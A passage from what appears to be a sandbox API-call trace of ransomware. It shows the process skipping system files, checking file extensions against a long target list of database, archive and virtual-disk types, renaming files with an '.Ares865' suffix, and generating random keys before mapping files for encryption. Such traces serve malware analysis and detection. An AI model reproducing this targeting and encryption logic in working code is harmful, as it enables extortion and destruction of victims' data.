lpString2="..") returned 1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="windows") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="bootmgr") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="temp") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="pagefile.sys") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="boot") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="ids.txt") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="ntuser.dat") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="perflogs") returned -1 [0058.034] lstrcmpiW (lpString1="Administrative Tools", lpString2="MSBuild") returned -1 [0058.034] lstrlenW (lpString="Administrative Tools") returned 20 [0058.034] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned 53 [0058.035] lstrcpyW (in: lpString1=0x2cce454, lpString2="Administrative Tools" | out: lpString1="Administrative Tools") returned="Administrative Tools" [0058.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0058.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2effc8 [0058.035] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2388 [0058.035] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0058.035] lstrlenW (lpString="desktop.ini") returned 11 [0058.035] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned 62 [0058.035] lstrcpyW (in: lpString1=0x2cce454, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0058.035] lstrlenW (lpString="desktop.ini") returned 11 [0058.035] lstrlenW (lpString="Ares865") returned 7 [0058.035] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.035] lstrlenW (lpString=".dll") returned 4 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0058.035] lstrlenW (lpString=".lnk") returned 4 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0058.035] lstrlenW (lpString=".ini") returned 4 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0058.035] lstrlenW (lpString=".sys") returned 4 [0058.035] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0058.035] lstrlenW (lpString="desktop.ini") returned 11 [0058.035] lstrlenW (lpString="bak") returned 3 [0058.035] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.035] lstrlenW (lpString="ba_") returned 3 [0058.035] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.036] lstrlenW (lpString="dbb") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.036] lstrlenW (lpString="vmdk") returned 4 [0058.036] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.036] lstrlenW (lpString="rar") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.036] lstrlenW (lpString="zip") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.036] lstrlenW (lpString="tgz") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.036] lstrlenW (lpString="vbox") returned 4 [0058.036] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.036] lstrlenW (lpString="vdi") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.036] lstrlenW (lpString="vhd") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.036] lstrlenW (lpString="vhdx") returned 4 [0058.036] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.036] lstrlenW (lpString="avhd") returned 4 [0058.036] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.036] lstrlenW (lpString="db") returned 2 [0058.036] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.036] lstrlenW (lpString="db2") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.036] lstrlenW (lpString="db3") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.036] lstrlenW (lpString="dbf") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.036] lstrlenW (lpString="mdf") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.036] lstrlenW (lpString="mdb") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.036] lstrlenW (lpString="sql") returned 3 [0058.036] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.036] lstrlenW (lpString="sqlite") returned 6 [0058.036] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.036] lstrlenW (lpString="sqlite3") returned 7 [0058.036] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.037] lstrlenW (lpString="sqlitedb") returned 8 [0058.037] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.037] lstrlenW (lpString="xml") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.037] lstrlenW (lpString="$er") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.037] lstrlenW (lpString="4dd") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.037] lstrlenW (lpString="4dl") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.037] lstrlenW (lpString="^^^") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.037] lstrlenW (lpString="abs") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.037] lstrlenW (lpString="abx") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.037] lstrlenW (lpString="accdb") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.037] lstrlenW (lpString="accdc") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.037] lstrlenW (lpString="accde") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.037] lstrlenW (lpString="accdr") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.037] lstrlenW (lpString="accdt") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.037] lstrlenW (lpString="accdw") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.037] lstrlenW (lpString="accft") returned 5 [0058.037] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.037] lstrlenW (lpString="adb") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.037] lstrlenW (lpString="adb") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.037] lstrlenW (lpString="ade") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.037] lstrlenW (lpString="adf") returned 3 [0058.037] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.038] lstrlenW (lpString="adn") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.038] lstrlenW (lpString="adp") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.038] lstrlenW (lpString="alf") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.038] lstrlenW (lpString="ask") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.038] lstrlenW (lpString="btr") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.038] lstrlenW (lpString="cat") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.038] lstrlenW (lpString="cdb") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.038] lstrlenW (lpString="ckp") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.038] lstrlenW (lpString="cma") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.038] lstrlenW (lpString="cpd") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.038] lstrlenW (lpString="dacpac") returned 6 [0058.038] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.038] lstrlenW (lpString="dad") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.038] lstrlenW (lpString="dadiagrams") returned 10 [0058.038] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.038] lstrlenW (lpString="daschema") returned 8 [0058.038] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.038] lstrlenW (lpString="db-journal") returned 10 [0058.038] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.038] lstrlenW (lpString="db-shm") returned 6 [0058.038] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.038] lstrlenW (lpString="db-wal") returned 6 [0058.038] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.038] lstrlenW (lpString="dbc") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.038] lstrlenW (lpString="dbs") returned 3 [0058.038] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.039] lstrlenW (lpString="dbt") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.039] lstrlenW (lpString="dbv") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.039] lstrlenW (lpString="dbx") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.039] lstrlenW (lpString="dcb") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.039] lstrlenW (lpString="dct") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.039] lstrlenW (lpString="dcx") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.039] lstrlenW (lpString="ddl") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.039] lstrlenW (lpString="dlis") returned 4 [0058.039] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.039] lstrlenW (lpString="dp1") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.039] lstrlenW (lpString="dqy") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.039] lstrlenW (lpString="dsk") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.039] lstrlenW (lpString="dsn") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.039] lstrlenW (lpString="dtsx") returned 4 [0058.039] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.039] lstrlenW (lpString="dxl") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.039] lstrlenW (lpString="eco") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.039] lstrlenW (lpString="ecx") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.039] lstrlenW (lpString="edb") returned 3 [0058.039] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.039] lstrlenW (lpString="epim") returned 4 [0058.039] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.039] lstrlenW (lpString="fcd") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.040] lstrlenW (lpString="fdb") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.040] lstrlenW (lpString="fic") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.040] lstrlenW (lpString="flexolibrary") returned 12 [0058.040] lstrlenW (lpString="fm5") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.040] lstrlenW (lpString="fmp") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.040] lstrlenW (lpString="fmp12") returned 5 [0058.040] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.040] lstrlenW (lpString="fmpsl") returned 5 [0058.040] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.040] lstrlenW (lpString="fol") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.040] lstrlenW (lpString="fp3") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.040] lstrlenW (lpString="fp4") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.040] lstrlenW (lpString="fp5") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.040] lstrlenW (lpString="fp7") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.040] lstrlenW (lpString="fpt") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.040] lstrlenW (lpString="frm") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.040] lstrlenW (lpString="gdb") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.040] lstrlenW (lpString="gdb") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.040] lstrlenW (lpString="grdb") returned 4 [0058.040] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.040] lstrlenW (lpString="gwi") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.040] lstrlenW (lpString="hdb") returned 3 [0058.040] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.041] lstrlenW (lpString="his") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.041] lstrlenW (lpString="ib") returned 2 [0058.041] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.041] lstrlenW (lpString="idb") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.041] lstrlenW (lpString="ihx") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.041] lstrlenW (lpString="itdb") returned 4 [0058.041] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.041] lstrlenW (lpString="itw") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.041] lstrlenW (lpString="jet") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.041] lstrlenW (lpString="jtx") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.041] lstrlenW (lpString="kdb") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.041] lstrlenW (lpString="kexi") returned 4 [0058.041] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.041] lstrlenW (lpString="kexic") returned 5 [0058.041] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.041] lstrlenW (lpString="kexis") returned 5 [0058.041] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.041] lstrlenW (lpString="lgc") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.041] lstrlenW (lpString="lwx") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.041] lstrlenW (lpString="maf") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.041] lstrlenW (lpString="maq") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.041] lstrlenW (lpString="mar") returned 3 [0058.041] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.042] lstrlenW (lpString="marshal") returned 7 [0058.042] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.042] lstrlenW (lpString="mas") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.042] lstrlenW (lpString="mav") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.042] lstrlenW (lpString="maw") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.042] lstrlenW (lpString="mdbhtml") returned 7 [0058.042] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.042] lstrlenW (lpString="mdn") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.042] lstrlenW (lpString="mdt") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.042] lstrlenW (lpString="mfd") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.042] lstrlenW (lpString="mpd") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.042] lstrlenW (lpString="mrg") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.042] lstrlenW (lpString="mud") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.042] lstrlenW (lpString="mwb") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.042] lstrlenW (lpString="myd") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.042] lstrlenW (lpString="ndf") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.042] lstrlenW (lpString="nnt") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.042] lstrlenW (lpString="nrmlib") returned 6 [0058.042] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.042] lstrlenW (lpString="ns2") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.042] lstrlenW (lpString="ns3") returned 3 [0058.042] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.043] lstrlenW (lpString="ns4") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.043] lstrlenW (lpString="nsf") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.043] lstrlenW (lpString="nv") returned 2 [0058.043] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.043] lstrlenW (lpString="nv2") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.043] lstrlenW (lpString="nwdb") returned 4 [0058.043] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.043] lstrlenW (lpString="nyf") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.043] lstrlenW (lpString="odb") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.043] lstrlenW (lpString="odb") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.043] lstrlenW (lpString="oqy") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.043] lstrlenW (lpString="ora") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.043] lstrlenW (lpString="orx") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.043] lstrlenW (lpString="owc") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.043] lstrlenW (lpString="p96") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.043] lstrlenW (lpString="p97") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.043] lstrlenW (lpString="pan") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.043] lstrlenW (lpString="pdb") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.043] lstrlenW (lpString="pdm") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.043] lstrlenW (lpString="pnz") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.043] lstrlenW (lpString="qry") returned 3 [0058.043] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.043] lstrlenW (lpString="qvd") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.044] lstrlenW (lpString="rbf") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.044] lstrlenW (lpString="rctd") returned 4 [0058.044] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.044] lstrlenW (lpString="rod") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.044] lstrlenW (lpString="rodx") returned 4 [0058.044] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.044] lstrlenW (lpString="rpd") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.044] lstrlenW (lpString="rsd") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.044] lstrlenW (lpString="sas7bdat") returned 8 [0058.044] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.044] lstrlenW (lpString="sbf") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.044] lstrlenW (lpString="scx") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.044] lstrlenW (lpString="sdb") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.044] lstrlenW (lpString="sdc") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.044] lstrlenW (lpString="sdf") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.044] lstrlenW (lpString="sis") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.044] lstrlenW (lpString="spq") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.044] lstrlenW (lpString="te") returned 2 [0058.044] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.044] lstrlenW (lpString="teacher") returned 7 [0058.044] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.044] lstrlenW (lpString="tmd") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.044] lstrlenW (lpString="tps") returned 3 [0058.044] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.044] lstrlenW (lpString="trc") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.045] lstrlenW (lpString="trc") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.045] lstrlenW (lpString="trm") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.045] lstrlenW (lpString="udb") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.045] lstrlenW (lpString="udl") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.045] lstrlenW (lpString="usr") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.045] lstrlenW (lpString="v12") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.045] lstrlenW (lpString="vis") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.045] lstrlenW (lpString="vpd") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.045] lstrlenW (lpString="vvv") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.045] lstrlenW (lpString="wdb") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.045] lstrlenW (lpString="wmdb") returned 4 [0058.045] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.045] lstrlenW (lpString="wrk") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.045] lstrlenW (lpString="xdb") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.045] lstrlenW (lpString="xld") returned 3 [0058.045] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.045] lstrlenW (lpString="xmlff") returned 5 [0058.045] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.045] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\desktop.ini.Ares865") returned 61 [0058.045] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.048] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.049] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=476) returned 1 [0058.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.049] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.050] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.050] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.050] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x154 [0058.052] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x190000 [0058.053] CryptAcquireContextW (in: 